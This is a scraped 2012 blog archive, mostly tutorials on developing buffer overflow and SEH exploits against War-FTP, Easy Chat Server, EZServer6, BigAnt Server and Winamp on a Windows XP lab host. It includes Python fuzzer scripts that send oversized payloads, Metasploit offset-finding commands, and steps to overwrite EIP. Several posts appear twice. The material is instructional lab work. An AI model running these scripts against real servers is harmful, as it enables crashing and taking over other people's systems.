Autopsy
The Autopsy Forensic Browser is a graphical interface to the digital investigation tools in The
Sleuth Kit. Together, they allow you to investigate the file system and volumes of a computer.
PTK
PTK forensics is a computer forensic framework for the command line tools in the SleuthKit plus
much more software modules. This makes it usable and easy to investigate a system. PTK forensics
offers many features such as multi-user analysis, search and management of complex digital
investigation cases. The core component of the software is an efficient Indexing Engine performing
different preliminary analysis operations during the import phase of each piece of evidence. PTK
forensics is a complex web application based on very innovative technologies and builds an
appealing, highly dynamic and very easy to use interface. Its developers used the PHP language and
a back-end MySQL database implementing thus the LAMP structure (Linux-Apache-MySql-PHP).
Monday, November 5, 2012
Friday, October 19, 2012
Crafted File with Msfpayload and Msfencode
Metasploit is framework which provides information about security
vulnerabilities
and aids in penetration
testing.
There are several programs in metasploit, included msfpayload and
msfencode.
msfpayload is one of the tools contained in metasploit used to make a
payload.
Wednesday, October 10, 2012
Software Exploitation : Easy Chat Server
Now, I'm going to show you how to exploitation an application called EasyChatServer running on Windows XP SP3.
as shown in the image above, we can access the server using a browser in backtrck system.
Because this application is a web application, we will tap using wireshark.
From the above description, we can use the GET method to perform exploitation
Our first fuzzer :
#!/usr/bin/python
import socket
target="192.168.1.101"
target_port=80
data="\x41" * 5000
buff="GET /chat.ghp?username="+data+"&password="+data+"&room=1 HTTP/1.1\r\n"
buff+="Host:192.168.1.101\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff+"\r\n\r\n")
print "Sukses....!!"
sock.close()
Now, we can see what happens in SEH chain (view + SEH chain).
Then, press Shift+F9, and look at this picture :
looking for a stepping stone
Finding a stepping stone is the file in which there is a command RETN POP POP. So, I choose ssleay.dll in easy chat server folder installation.
As we can see in the picture, the value of bits in the second byte is zero. so the module does not have the protection or safeSEH SEH. Now, we will looking for RETN POP POP commands contained in the module ssleay32.dll.
root@bt:/opt/metasploit/msf3# ./msfpescan -p /root/ssleay32.dll
we can use RETN POP POP commands that are in the address 0x1001b9a2
In OllyDbg select the menu view+Executable modules, then double click ssleay32.dll.
In this module window, right click+search for + Sequence of commands.
a new window will appear and fill it with the following command.
click find button and a new window will appear again.
seek offsets to overwrite SEH
In this step, we can use ./patter_create.rb
Input the results of pattern_create (chatpattern.txt) into our fuzzer.
Then in OllyDbg will look like the following :
Then, press Shift+F9, and then we will know the contents of the EIP.
We can use patter_offset.rb to determine the number of bytes to EIP affected by the fuzzer.
with these results, we will modify our fuzzer as follows:
fuzzer run and look in OllyDbg.
Press shift+f9 and see what happens in EIP.
as shown in the image above, we can access the server using a browser in backtrck system.
Because this application is a web application, we will tap using wireshark.
From the above description, we can use the GET method to perform exploitation
Our first fuzzer :
#!/usr/bin/python
import socket
target="192.168.1.101"
target_port=80
data="\x41" * 5000
buff="GET /chat.ghp?username="+data+"&password="+data+"&room=1 HTTP/1.1\r\n"
buff+="Host:192.168.1.101\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff+"\r\n\r\n")
print "Sukses....!!"
sock.close()
Now, we can see what happens in SEH chain (view + SEH chain).
Then, press Shift+F9, and look at this picture :
looking for a stepping stone
Finding a stepping stone is the file in which there is a command RETN POP POP. So, I choose ssleay.dll in easy chat server folder installation.
root@bt:/opt/metasploit/msf3# ./msfpescan -p /root/ssleay32.dll
we can use RETN POP POP commands that are in the address 0x1001b9a2
In OllyDbg select the menu view+Executable modules, then double click ssleay32.dll.
In this module window, right click+search for + Sequence of commands.
a new window will appear and fill it with the following command.
click find button and a new window will appear again.
seek offsets to overwrite SEH
In this step, we can use ./patter_create.rb
Then in OllyDbg will look like the following :
Then, press Shift+F9, and then we will know the contents of the EIP.
We can use patter_offset.rb to determine the number of bytes to EIP affected by the fuzzer.
with these results, we will modify our fuzzer as follows:
fuzzer run and look in OllyDbg.
Press shift+f9 and see what happens in EIP.
Wednesday, October 3, 2012
Software Exploitation : EZServer6
In this tutorial, we will try to exploit an application for video server, called ezserver, running on Windows XP. This application can be accessed with a web browser on port 8000. so, we will send a fuzzer that contains garbage data via GET method.
Fuzzer used are as follows:
#!/usr/bin/python
import socket
target="192.168.1.101"
target_port=8000
buff="GET /" + "\x41" * 10000 + "HTTP/1.0\r\n\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff)
print "Sukses....!!"
sock.close()
Let's fuzzing and see what happens...
ez server crashes and disappears from the screen. Then we will see through OllyDbg.
To be Continue...^_^
Fuzzer used are as follows:
#!/usr/bin/python
import socket
target="192.168.1.101"
target_port=8000
buff="GET /" + "\x41" * 10000 + "HTTP/1.0\r\n\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff)
print "Sukses....!!"
sock.close()
Let's fuzzing and see what happens...
ez server crashes and disappears from the screen. Then we will see through OllyDbg.
To be Continue...^_^
Monday, October 1, 2012
Software Exploitation : BigAnt Server
As we know that BigAnt Server compiled with SEH and safeSEH, in this tutorial I'm going to show you how to exploitation this application.
Fuzzing :
#!/usr/bin/python
import socket
target="192.168.1.101"
target_port=6660
buff="USV " + "\x41" * 2500
buff+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff)
print "Sukses....!!"
sock.close()
run this fuzzer and see what happens..in Ollydbg
But, EIP not overwrite with our fuzzer, because this application compiled with SEH and safeSEH. To look into SEH, select view+SEH chain.
So, press shift+F9 button to forward our fuzzer in to EIP.
In the figure above, we can see that EIP overwrite with 41414141, where this characters comes from the fuzzer.
To be continue...^_^
Fuzzing :
#!/usr/bin/python
import socket
target="192.168.1.101"
target_port=6660
buff="USV " + "\x41" * 2500
buff+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff)
print "Sukses....!!"
sock.close()
run this fuzzer and see what happens..in Ollydbg
But, EIP not overwrite with our fuzzer, because this application compiled with SEH and safeSEH. To look into SEH, select view+SEH chain.
So, press shift+F9 button to forward our fuzzer in to EIP.
In the figure above, we can see that EIP overwrite with 41414141, where this characters comes from the fuzzer.
To be continue...^_^
Friday, September 28, 2012
Local Buffer Overflow : Winamp v5.572
I try to make Winamp 5.572 running on Windows XP SP3 crash. First, I will send a music file to be run by winamp. To make this file, I search in exploit-db.
I would choose /windows/dos/12494.pl
root@bt:~# cp /pentest/exploits/exploitdb/platforms//windows/dos/12494.pl /root
root@bt:~# mv 12494.pl wincrash.pl
Change line 1 with this :
#!/usr/bin/perl
And then execute this file :
root@bt:~# perl wincrash.pl
then there is a file X.swf
Send to Windows XP and play by winamp, and see what happens..
when viewed with OllyDbg
Thanks...^_^
I would choose /windows/dos/12494.pl
root@bt:~# cp /pentest/exploits/exploitdb/platforms//windows/dos/12494.pl /root
root@bt:~# mv 12494.pl wincrash.pl
Change line 1 with this :
#!/usr/bin/perl
And then execute this file :
root@bt:~# perl wincrash.pl
then there is a file X.swf
Send to Windows XP and play by winamp, and see what happens..
when viewed with OllyDbg
Thanks...^_^
Wednesday, September 19, 2012
Software Exploitation Part 1
In this tutorial, I will try to explain the basics of software exploitation. On this occasion, I will give an example of a simple application that runs on Windows operating systems, called war-FTP. War-FTP is an FTP server application that runs on Windows and is an application that does not have protection against buffer overflow (non SEH). Ok, now what is a buffer overflow?, and what is a SEH ?
Buffer Overflow
Buffer overflow occurs when a buffer overflow happens when an application receives a bigger chunk of data than it is expecting, with the result that the data doesn't fit into the allocated storage space, or buffer. The reason that buffer overflow errors are so common is that human programmers make errors: they fail to foresee that unexpected data values may be entered, and they fail to carry out bounds checking to ensure that any data that a user enters falls within the expected range.
SEH
An exception is an event that occurs during the execution of a program, and requires the
execution of code outside the normal flow of control. Structured exception handling is a mechanism for handling both hardware and software exceptions. When a SEH exception occurs, you typically see a window that offers to send an error report to Microsoft
Lets Begin !!
Host : Backtrack 5 R2 (IP address : 192.168.1.1)
Target : Microsoft Windows XP SP3 (IP address 192.168.1.101)
Target apps : War-FTP on win XP (port 21)
Information gathering
from Nessus :
Description from Nessus (select as shown figure above)
The version of War FTP Daemon running on this host contains a buffer overflow in the code that handles the USER and PASS commands. A potential intruder could use this vulnerability to crash the server as well as run arbitrary commands on the system.
After this, we can fuzzing with simple fuzzer. We will try to send data 'A' as much as 1000 to war-FTP application by this fuzzer.
#!/usr/bin/python
#file : myfuzzer.py
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x41" * 1000
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
we can run a fuzzer is as follows :
Wow...war-FTP application immediately closed. in this case, war-FTP crashes caused by fuzzer.
Ok, after this, if we can't run a War-FTP. Therefore, we have to delete FtpDaemon.dat in our War-FTP folder.
Debugger
Now, we want to know what happens in memory system of War-FTP. In this case, we will use debugger in Windows XP, Ollydbg.
Please runs War-FTP under Ollydbg and than we will fuzzing again.
Ok, we will find out in how many bytes to accumulate EIP register. We will use 2 little program, pattern_create.rb & pattern_offset.rb. The location of the file is /opt/metasploit/apps/pro/msf3/tools/.
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_create.rb > string_pattern.txt
We will use pattern in string_pattern.txt as data when we fuzzing.
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8A
b9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0
Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3
Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5
Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8
Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9
An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0
Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1
Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3
At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4
Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4
Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5
Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6
Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8
Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1
Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
Fuzzing again....!, then you will see the following war-FTP
Now we will calculate the amount of bytes from the pattern set generated by the application pattern_create.rb. We will use patter_offset.rb
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb 32714131
485
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb q4Aq5Aq
493
root@bt:/opt/metasploit/apps/pro/msf3/tools#
Note :
32714131 is EIP address
q4Aq5Aq is data ESP
Ok, we will modify our fuzzer as follows :
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x90" * 485
buff+="\xEF\xBE\xAD\xDE"
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
Fuzzing again...
Ok, we will modify again our fuzzer as follows :
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x90" * 485
buff+="\xEF\xBE\xAD\xDE"
buff+="\x90" * (493-len(buff))
buff+="\xC" * (1000 - len(buff))
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
Continued on software exploitation part 2
Buffer Overflow
Buffer overflow occurs when a buffer overflow happens when an application receives a bigger chunk of data than it is expecting, with the result that the data doesn't fit into the allocated storage space, or buffer. The reason that buffer overflow errors are so common is that human programmers make errors: they fail to foresee that unexpected data values may be entered, and they fail to carry out bounds checking to ensure that any data that a user enters falls within the expected range.
SEH
An exception is an event that occurs during the execution of a program, and requires the
execution of code outside the normal flow of control. Structured exception handling is a mechanism for handling both hardware and software exceptions. When a SEH exception occurs, you typically see a window that offers to send an error report to Microsoft
Lets Begin !!
Host : Backtrack 5 R2 (IP address : 192.168.1.1)
Target : Microsoft Windows XP SP3 (IP address 192.168.1.101)
Target apps : War-FTP on win XP (port 21)
Information gathering
from Nessus :
Description from Nessus (select as shown figure above)
The version of War FTP Daemon running on this host contains a buffer overflow in the code that handles the USER and PASS commands. A potential intruder could use this vulnerability to crash the server as well as run arbitrary commands on the system.
After this, we can fuzzing with simple fuzzer. We will try to send data 'A' as much as 1000 to war-FTP application by this fuzzer.
#!/usr/bin/python
#file : myfuzzer.py
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x41" * 1000
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
we can run a fuzzer is as follows :
Wow...war-FTP application immediately closed. in this case, war-FTP crashes caused by fuzzer.
Ok, after this, if we can't run a War-FTP. Therefore, we have to delete FtpDaemon.dat in our War-FTP folder.
Debugger
Now, we want to know what happens in memory system of War-FTP. In this case, we will use debugger in Windows XP, Ollydbg.
Please runs War-FTP under Ollydbg and than we will fuzzing again.
Ok, we will find out in how many bytes to accumulate EIP register. We will use 2 little program, pattern_create.rb & pattern_offset.rb. The location of the file is /opt/metasploit/apps/pro/msf3/tools/.
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_create.rb > string_pattern.txt
We will use pattern in string_pattern.txt as data when we fuzzing.
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8A
b9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0
Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3
Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5
Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8
Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9
An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0
Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1
Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3
At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4
Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4
Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5
Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6
Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8
Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1
Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
Fuzzing again....!, then you will see the following war-FTP
Now we will calculate the amount of bytes from the pattern set generated by the application pattern_create.rb. We will use patter_offset.rb
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb 32714131
485
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb q4Aq5Aq
493
root@bt:/opt/metasploit/apps/pro/msf3/tools#
Note :
32714131 is EIP address
q4Aq5Aq is data ESP
Ok, we will modify our fuzzer as follows :
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x90" * 485
buff+="\xEF\xBE\xAD\xDE"
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
Fuzzing again...
Ok, we will modify again our fuzzer as follows :
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x90" * 485
buff+="\xEF\xBE\xAD\xDE"
buff+="\x90" * (493-len(buff))
buff+="\xC" * (1000 - len(buff))
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
Continued on software exploitation part 2
Subscribe to:
Posts (Atom)